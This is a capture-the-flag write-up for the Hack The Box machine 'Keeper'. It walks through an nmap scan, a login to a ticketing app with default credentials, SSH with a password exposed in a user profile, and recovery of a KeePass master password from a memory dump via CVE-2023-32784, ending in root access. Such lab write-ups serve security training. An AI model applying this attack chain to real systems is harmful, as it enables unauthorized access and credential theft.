HTB — Keeper

A Linux-based box related to CVE-2023–32784 vulnerability.

Box Preview

Box Overview:

The Keeper is a Linux-based box that involves a request tracker application to deal with. It involves enumeration, lateral movement, and some familiarity with KeePass client to escalate the privileges. Without any further due, let's dive into the technicalities.

Enumeration:

Initiating the nmap scan to find the open ports and running services.

nmap -p- -sC -sV -T4 -A -Pn 10.10.11.227 -oA scans/tcp_scans 

Output of Nmap scan:

PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 35:39:d4:39:40:4b:1f:61:86:dd:7c:37:bb:4b:98:9e (ECDSA)
|_  256 1a:e9:72:be:8b:b1:05:d5:ef:fe:dd:80:d8:ef:c0:66 (ED25519)
80/tcp    open     http    nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
19798/tcp filtered unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/20%OT=22%CT=1%CU=40744%PV=Y%DS=2%DC=T%G=Y%TM=65AB
OS:B996%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=110%TI=Z%CI=Z%II=I%TS=A)O
OS:PS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53CS
OS:T11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)E
OS:CN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z
OS:%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=
OS:N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%
OS:CD=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 110/tcp)
HOP RTT       ADDRESS
1   285.31 ms 10.10.14.1
2   285.47 ms 10.10.11.227

Short notes derived from the above result:

• 22/tcp port is open and running OpenSSH 8.9p1 This version of OpenSSH does not associate with any major vulnerability that can give us remote code execution or at least initial footholds.
• 80/tcp port is open and running nginx 1.18.0 which does not provide a smooth path to proceed with.

Since this machine has port 80 open, let's visit this in the browser.

Browsing Port 80

The website is not loading properly and asking us to visit tickets.keeper.htb, therefore we need to add this host to our system’s /etc/hosts file.

Hosts File

After adding the hosts to the /etc/hosts file, let's visit the tickets.keeper.htb domain.

Login Page

After doing some research about this request tracker application, we were able to find its default credentials i.e. root:password and it worked too.

Logged In as root user

Now, we need to do some lateral movement to make ourselves familiar with the application. After some lateral movement, we got to know that there were other users too.

Selecting Users

We found that there are two users i.e. root & lnorgaard

Found New User

We got the credentials of lnorgaard user by clicking on its username.

lnorgaard user credentials

Since we have another user credentials, let's try to log in via SSH using lnorgaard:Welcome2023!

Logged in via SSH as lnorgaard

We got the shell with low privileges. Now we can read the user flag.

User Flag

To escalate the privileges, we will be using RT30000.zip file. To do that, we will take this file on our attacking machine and then perform further operations.

Taking RT30000.zip on our attacking machine

On extracting the zip file, we got the following two files.

Extracted Files

As I mentioned at the beginning of the article, this box is related to the CVE-2023–32784. After reading this I got an idea of how to exploit this vulnerability.

Exploitation:

To exploit the above vulnerability, we transferred the above files to our Windows machine. First, we will download this GitHub repository on a Windows machine and then put the KeePassDumpFull.dmp file in the same directory.

KeePass Dumper Github Repo

Now, we will attempt to retrieve the password from this dump file.

Note: To execute dotnet run command you will need to install .Net on you windows machine.

Initiating Dotnet Run Command

This might take a while to give the final output. After some time the final output is as follows:

Master Password

We got a weird string and on doing some research we found that this is the name of a dessert in the Danish language but the correct name is rødgrød med fløde which is a Danish translation of Red porridge with cream.

Now we need to install the KeePass client on our Windows machine. And later we need to open passcoded.kdbx file in KeePass client.

Asking for the master password

Now we will use rødgrød med fløde as our master password.

KeePass Database

Now we will copy the content of the root user and save it to key.ppk file.

key.ppk File

We will now convert this .ppk key to id_rsausing the following command.

puttygen key.ppk -O private-openssh -o id_rsa

Setting the permission of id_rsa to 600.

chmod 600 id_rsa

Our root user's private SSH key is ready. Let's try to log in as the root user using this SSH key.

Root Shell

Finally, we got the root shell and read the root flag.

References:

• https://nvd.nist.gov/vuln/detail/CVE-2023-32784
• https://github.com/vdohney/keepass-password-dumper?tab=readme-ov-file
• https://thehackernews.com/2023/05/keepass-exploit-allows-attackers-to.html